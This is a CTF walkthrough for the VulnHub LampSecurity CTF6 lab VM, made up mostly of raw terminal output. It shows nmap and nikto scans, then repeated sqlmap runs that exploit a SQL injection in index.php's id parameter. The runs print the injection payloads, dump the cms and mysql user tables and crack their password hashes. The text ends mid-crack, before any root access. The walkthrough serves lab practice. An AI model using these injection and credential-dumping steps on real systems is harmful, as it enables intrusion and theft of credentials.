LAMPSECURITY: CTF6 内网拿到root 20211226

LAMPSECURITY: CTF6

  • 参考博客:
  • https://blog.csdn.net/weixin_42652002/article/details/112132466?spm=1001.2101.3001.6650.2&utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7Edefault-2.nonecase&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7Edefault-2.nonecase

About Release

Back to the Top

Download

Back to the Top

Please remember that VulnHub is a free community resource so we are unable to check the machines that are provided to us. Before you download, please read our FAQs sections dealing with the dangers of running unknown VMs and our suggestions for “protecting yourself and your network. If you understand the risks, please download!

image-20211129230845567

image-20211129230822623

image-20211129230903890

                                                                                                                                                                                      
┌──(root💀kwkl)-[~]
└─# nmap -n 172.16.70.0/24              
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-28 23:00 HKT

                                                                                                                                                                                              
┌──(root💀kwkl)-[~]
└─# nmap -n 172.16.70.0/24                                                                                                                                                              130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-28 23:00 HKT
Nmap scan report for 172.16.70.1
Host is up (0.00020s latency).
Not shown: 998 closed ports
PORT      STATE SERVICE
49158/tcp open  unknown
49161/tcp open  unknown
MAC Address: 00:50:56:C0:00:05 (VMware)

Nmap scan report for 172.16.70.2
Host is up (0.000059s latency).
All 1000 scanned ports on 172.16.70.2 are closed
MAC Address: 00:50:56:EE:4E:08 (VMware)

Nmap scan report for 172.16.70.141
Host is up (0.0014s latency).
Not shown: 990 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
110/tcp  open  pop3
111/tcp  open  rpcbind
143/tcp  open  imap
443/tcp  open  https
700/tcp  open  epp
993/tcp  open  imaps
995/tcp  open  pop3s
3306/tcp open  mysql
MAC Address: 00:0C:29:64:07:10 (VMware)

Nmap scan report for 172.16.70.254
Host is up (0.00015s latency).
All 1000 scanned ports on 172.16.70.254 are filtered
MAC Address: 00:50:56:E0:03:82 (VMware)

Nmap scan report for 172.16.70.122
Host is up (0.0000030s latency).
Not shown: 999 closed ports
PORT     STATE SERVICE
3000/tcp open  ppp

Nmap done: 256 IP addresses (5 hosts up) scanned in 11.92 seconds
                                                                                                                                                                                              
┌──(root💀kwkl)-[~]
└─# /opt/nikto-master/program/nikto.pl -host 172.16.70.141
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          172.16.70.141
+ Target Hostname:    172.16.70.141
+ Target Port:        80
+ Start Time:         2021-11-28 23:11:09 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.3 (CentOS)
+ Retrieved x-powered-by header: PHP/5.2.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type.
+ Cookie PHPSESSID created without the httponly flag
+ Apache/2.2.3 appears to be outdated (current is at least Apache/2.4.46). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE 
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting.
+ OSVDB-3268: /files/: Directory indexing found.
+ OSVDB-3092: /files/: This might be interesting.
+ OSVDB-3268: /lib/: Directory indexing found.
+ OSVDB-3092: /lib/: This might be interesting.
+ Cookie roundcube_sessid created without the httponly flag
+ OSVDB-3092: /mail/: This might be interesting.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ Server may leak inodes via ETags, header found with file /phpmyadmin/ChangeLog, inode: 97164, size: 35791, mtime: Thu Oct 20 05:47:44 2095
+ OSVDB-3092: /phpmyadmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /sql/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3268: /docs/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3092: /phpmyadmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 9068 requests: 0 error(s) and 31 item(s) reported on remote host
+ End Time:           2021-11-28 23:11:31 (GMT8) (22 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
                                                                                                                                                                                              
┌──(root💀kwkl)-[~]
└─# sqlmap -u 'http://172.16.70.141/index.php?id=3'                                                                                                                                       1 ⨯
        ___
       __H__                                                                                                                                                                                  
 ___ ___[)]_____ ___ ___  {1.5.10#stable}                                                                                                                                                     
|_ -| . [,]     | .'| . |                                                                                                                                                                     
|___|_  [,]_|_|_|__,|  _|                                                                                                                                                                     
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                  

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:13:49 /2021-11-28/

[23:13:49] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=luip1tdpjrs...vh3skavum1'). Do you want to use those [Y/n] y
[23:13:51] [INFO] checking if the target is protected by some kind of WAF/IPS
[23:13:51] [INFO] testing if the target URL content is stable
[23:13:51] [INFO] target URL content is stable
[23:13:51] [INFO] testing if GET parameter 'id' is dynamic
[23:13:51] [INFO] GET parameter 'id' appears to be dynamic
[23:13:51] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable
[23:13:51] [INFO] testing for SQL injection on GET parameter 'id'
[23:13:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:13:51] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="eu")
[23:13:51] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL' 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[23:13:55] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[23:13:55] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[23:13:55] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[23:13:55] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[23:13:55] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[23:13:55] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[23:13:55] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[23:13:55] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[23:13:55] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[23:13:55] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[23:13:55] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[23:13:55] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[23:13:55] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[23:13:55] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[23:13:55] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[23:13:55] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[23:13:55] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[23:13:55] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[23:13:55] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[23:13:55] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[23:13:55] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[23:13:55] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[23:13:55] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[23:13:55] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[23:13:55] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[23:13:55] [INFO] testing 'Generic inline queries'
[23:13:55] [INFO] testing 'MySQL inline queries'
[23:13:55] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[23:13:55] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[23:13:55] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[23:13:55] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[23:13:55] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[23:13:55] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[23:13:55] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[23:14:16] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[23:14:16] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[23:14:16] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[23:14:16] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[23:14:16] [INFO] target URL appears to have 7 columns in query
[23:14:16] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 72 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=3 AND 9068=9068

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=3 AND (SELECT 1514 FROM (SELECT(SLEEP(5)))zENA)

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: id=3 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a7171,0x644c49467875614873585a5669644f7a74445a417779496e72634a56474474595a6e437542477350,0x716a6b6271)-- -
---
[23:14:18] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: PHP, PHP 5.2.6, Apache 2.2.3
back-end DBMS: MySQL >= 5.0.12
[23:14:18] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.16.70.141'

[*] ending @ 23:14:18 /2021-11-28/

                                                                                                                                                                                              
┌──(root💀kwkl)-[~]
└─# sqlmap -u 'http://172.16.70.141/index.php?id=3' --dbs
        ___
       __H__                                                                                                                                                                                  
 ___ ___[,]_____ ___ ___  {1.5.10#stable}                                                                                                                                                     
|_ -| . [,]     | .'| . |                                                                                                                                                                     
|___|_  [(]_|_|_|__,|  _|                                                                                                                                                                     
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                  

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:14:40 /2021-11-28/

[23:14:40] [INFO] resuming back-end DBMS 'mysql' 
[23:14:40] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=2dkoho3oivq...usctg4idj6'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=3 AND 9068=9068

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=3 AND (SELECT 1514 FROM (SELECT(SLEEP(5)))zENA)

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: id=3 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a7171,0x644c49467875614873585a5669644f7a74445a417779496e72634a56474474595a6e437542477350,0x716a6b6271)-- -
---
[23:14:41] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: PHP 5.2.6, PHP, Apache 2.2.3
back-end DBMS: MySQL >= 5.0.12
[23:14:41] [INFO] fetching database names
available databases [5]:
[*] cms
[*] information_schema
[*] mysql
[*] roundcube
[*] test

[23:14:41] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.16.70.141'

[*] ending @ 23:14:41 /2021-11-28/

                                                                                                                                                                                              
┌──(root💀kwkl)-[~]
└─# sqlmap -u 'http://172.16.70.141/index.php?id=3' --current-user
        ___
       __H__                                                                                                                                                                                  
 ___ ___[']_____ ___ ___  {1.5.10#stable}                                                                                                                                                     
|_ -| . [.]     | .'| . |                                                                                                                                                                     
|___|_  [)]_|_|_|__,|  _|                                                                                                                                                                     
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                  

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:14:52 /2021-11-28/

[23:14:52] [INFO] resuming back-end DBMS 'mysql' 
[23:14:52] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=nv6jhhpdpmi...lkt0s8psd3'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=3 AND 9068=9068

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=3 AND (SELECT 1514 FROM (SELECT(SLEEP(5)))zENA)

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: id=3 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a7171,0x644c49467875614873585a5669644f7a74445a417779496e72634a56474474595a6e437542477350,0x716a6b6271)-- -
---
[23:14:54] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: PHP 5.2.6, PHP, Apache 2.2.3
back-end DBMS: MySQL >= 5.0.12
[23:14:54] [INFO] fetching current user
current user: 'cms_user@%'
[23:14:54] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.16.70.141'

[*] ending @ 23:14:54 /2021-11-28/

                                                                                                                                                                                              
┌──(root💀kwkl)-[~]
└─# sqlmap -u 'http://172.16.70.141/index.php?id=3' --dbs         
        ___
       __H__                                                                                                                                                                                  
 ___ ___[']_____ ___ ___  {1.5.10#stable}                                                                                                                                                     
|_ -| . [,]     | .'| . |                                                                                                                                                                     
|___|_  [(]_|_|_|__,|  _|                                                                                                                                                                     
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                  

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:15:05 /2021-11-28/

[23:15:06] [INFO] resuming back-end DBMS 'mysql' 
[23:15:06] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=5rdcvb0dsaa...0u6s67uu64'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=3 AND 9068=9068

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=3 AND (SELECT 1514 FROM (SELECT(SLEEP(5)))zENA)

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: id=3 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a7171,0x644c49467875614873585a5669644f7a74445a417779496e72634a56474474595a6e437542477350,0x716a6b6271)-- -
---
[23:15:07] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: PHP, Apache 2.2.3, PHP 5.2.6
back-end DBMS: MySQL >= 5.0.12
[23:15:07] [INFO] fetching database names
available databases [5]:
[*] cms
[*] information_schema
[*] mysql
[*] roundcube
[*] test

[23:15:07] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.16.70.141'

[*] ending @ 23:15:07 /2021-11-28/

                                                                                                                                                                                              
┌──(root💀kwkl)-[~]
└─# sqlmap -u 'http://172.16.70.141/index.php?id=3' -D cms --tables
        ___
       __H__                                                                                                                                                                                  
 ___ ___["]_____ ___ ___  {1.5.10#stable}                                                                                                                                                     
|_ -| . [']     | .'| . |                                                                                                                                                                     
|___|_  [,]_|_|_|__,|  _|                                                                                                                                                                     
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                  

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:15:19 /2021-11-28/

[23:15:19] [INFO] resuming back-end DBMS 'mysql' 
[23:15:19] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=0bgn1a9gu9h...nea1pq36c1'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=3 AND 9068=9068

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=3 AND (SELECT 1514 FROM (SELECT(SLEEP(5)))zENA)

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: id=3 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a7171,0x644c49467875614873585a5669644f7a74445a417779496e72634a56474474595a6e437542477350,0x716a6b6271)-- -
---
[23:15:20] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: PHP, Apache 2.2.3, PHP 5.2.6
back-end DBMS: MySQL >= 5.0.12
[23:15:20] [INFO] fetching tables for database: 'cms'
Database: cms
[3 tables]
+-------+
| log   |
| user  |
| event |
+-------+

[23:15:20] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.16.70.141'

[*] ending @ 23:15:20 /2021-11-28/

                                                                                                                                                                                              
┌──(root💀kwkl)-[~]
└─# sqlmap -u 'http://172.16.70.141/index.php?id=3' -D cms -T user --dump
        ___
       __H__                                                                                                                                                                                  
 ___ ___[(]_____ ___ ___  {1.5.10#stable}                                                                                                                                                     
|_ -| . [.]     | .'| . |                                                                                                                                                                     
|___|_  [']_|_|_|__,|  _|                                                                                                                                                                     
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                  

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:15:30 /2021-11-28/

[23:15:31] [INFO] resuming back-end DBMS 'mysql' 
[23:15:31] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=rnldshdj80n...8pkgcdsae5'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=3 AND 9068=9068

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=3 AND (SELECT 1514 FROM (SELECT(SLEEP(5)))zENA)

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: id=3 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a7171,0x644c49467875614873585a5669644f7a74445a417779496e72634a56474474595a6e437542477350,0x716a6b6271)-- -
---
[23:15:32] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: PHP, PHP 5.2.6, Apache 2.2.3
back-end DBMS: MySQL >= 5.0.12
[23:15:32] [INFO] fetching columns for table 'user' in database 'cms'
[23:15:32] [INFO] fetching entries for table 'user' in database 'cms'
[23:15:32] [INFO] recognized possible password hashes in column 'user_password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[23:15:33] [INFO] writing hashes to a temporary file '/tmp/sqlmap6gg64mtg25376/sqlmaphashes-57ixoe7m.txt' 
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[23:15:34] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
1
[23:15:37] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[23:15:38] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[23:15:38] [INFO] starting 12 processes 
[23:15:39] [INFO] cracked password 'adminpass' for hash '25e4ee4e9229397b6b17776bfceaf8e7'                                                                                                   
Database: cms                                                                                                                                                                                
Table: user
[1 entry]
+---------+----------------------------------------------+---------------+
| user_id | user_password                                | user_username |
+---------+----------------------------------------------+---------------+
| 1       | 25e4ee4e9229397b6b17776bfceaf8e7 (adminpass) | admin         |
+---------+----------------------------------------------+---------------+

[23:15:43] [INFO] table 'cms.`user`' dumped to CSV file '/root/.local/share/sqlmap/output/172.16.70.141/dump/cms/user.csv'
[23:15:43] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.16.70.141'

[*] ending @ 23:15:43 /2021-11-28/

                                                                                                                                                                                              
┌──(root💀kwkl)-[~]
└─# 

┌──(root💀kwkl)-[~]
└─# /opt/nikto-master/program/nikto.pl -host 172.16.70.141

  • Nikto v2.1.6

  • Target IP: 172.16.70.141
  • Target Hostname: 172.16.70.141
  • Target Port: 80
  • Start Time: 2021-11-28 23:11:09 (GMT8)

  • Server: Apache/2.2.3 (CentOS)
  • Retrieved x-powered-by header: PHP/5.2.6
  • The anti-clickjacking X-Frame-Options header is not present.
  • The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type.
  • Cookie PHPSESSID created without the httponly flag
  • Apache/2.2.3 appears to be outdated (current is at least Apache/2.4.46). Apache 2.2.34 is the EOL for the 2.x branch.
  • Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
  • Web Server returns a valid response with junk HTTP methods, this may cause false positives.
  • OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
  • OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
  • OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
  • OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
  • OSVDB-3268: /css/: Directory indexing found.
  • OSVDB-3092: /css/: This might be interesting.
  • OSVDB-3268: /files/: Directory indexing found.
  • OSVDB-3092: /files/: This might be interesting.
  • OSVDB-3268: /lib/: Directory indexing found.
  • OSVDB-3092: /lib/: This might be interesting.
  • Cookie roundcube_sessid created without the httponly flag
  • OSVDB-3092: /mail/: This might be interesting.
  • OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
  • Server may leak inodes via ETags, header found with file /phpmyadmin/ChangeLog, inode: 97164, size: 35791, mtime: Thu Oct 20 05:47:44 2095
  • OSVDB-3092: /phpmyadmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
  • OSVDB-3268: /sql/: Directory indexing found.
  • OSVDB-3092: /manual/: Web server manual found.
  • OSVDB-3268: /icons/: Directory indexing found.
  • OSVDB-3268: /manual/images/: Directory indexing found.
  • OSVDB-3268: /docs/: Directory indexing found.
  • OSVDB-3233: /icons/README: Apache default file found.
  • /phpmyadmin/: phpMyAdmin directory found
  • OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
  • OSVDB-3092: /phpmyadmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
  • 9068 requests: 0 error(s) and 31 item(s) reported on remote host
  • End Time: 2021-11-28 23:11:31 (GMT8) (22 seconds)

  • 1 host(s) tested

image-20211129231615514

┌──(root💀kwkl)-[~]
└─# sqlmap -u 'http://172.16.70.141/index.php?id=3' -D mysql -T user --dump
        ___
       __H__                                                                                                                                                                                  
 ___ ___[']_____ ___ ___  {1.5.10#stable}                                                                                                                                                     
|_ -| . [.]     | .'| . |                                                                                                                                                                     
|___|_  ["]_|_|_|__,|  _|                                                                                                                                                                     
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                  

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:14:31 /2021-11-29/

[23:14:31] [INFO] resuming back-end DBMS 'mysql' 
[23:14:31] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=8k7s0c8hh8h...9e6a2c7va3'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=3 AND 9068=9068

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=3 AND (SELECT 1514 FROM (SELECT(SLEEP(5)))zENA)

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: id=3 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a7171,0x644c49467875614873585a5669644f7a74445a417779496e72634a56474474595a6e437542477350,0x716a6b6271)-- -
---
[23:14:32] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: PHP, PHP 5.2.6, Apache 2.2.3
back-end DBMS: MySQL >= 5.0.12
[23:14:32] [INFO] fetching columns for table 'user' in database 'mysql'
[23:14:32] [INFO] fetching entries for table 'user' in database 'mysql'
[23:14:32] [INFO] recognized possible password hashes in column 'Password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[23:14:33] [INFO] writing hashes to a temporary file '/tmp/sqlmap7u2kha6j27776/sqlmaphashes-yz42cvrf.txt' 
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[23:14:34] [INFO] using hash method 'mysql_old_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 
[23:14:35] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[23:14:37] [INFO] starting dictionary-based cracking (mysql_old_passwd)
[23:14:37] [INFO] starting 12 processes 
[23:14:41] [INFO] cracked password 'mysqlpass' for hash '6cbbdf9b35eb7db1'                                                                                                                   
[23:14:44] [INFO] using suffix '1'                                                                                                                                                           
[23:14:51] [INFO] using suffix '123'                                                                                                                                                         
[23:14:59] [INFO] using suffix '2'                                                                                                                                                           
[23:15:07] [INFO] using suffix '12'                                                                                                                                                          
[23:15:15] [INFO] using suffix '3'                                                                                                                                                           
[23:15:24] [INFO] using suffix '13'                                                                                                                                                          
[23:15:32] [INFO] using suffix '7'                                                                                                                                                           
[23:15:40] [INFO] using suffix '11'                                                                                                                                                          
[23:15:47] [INFO] using suffix '5'                                                                                                                                                           
[23:15:55] [INFO] using suffix '22'                                                                                                                                                          
[23:16:03] [INFO] using suffix '23'                                                                                                                                                          
[23:16:10] [INFO] using suffix '01'                                                                                                                                                          
[23:16:18] [INFO] using suffix '4'                                                                                                                                                           
[23:16:26] [INFO] using suffix '07'                                                                                                                                                          
[23:16:34] [INFO] using suffix '21'                                                                                                                                                          
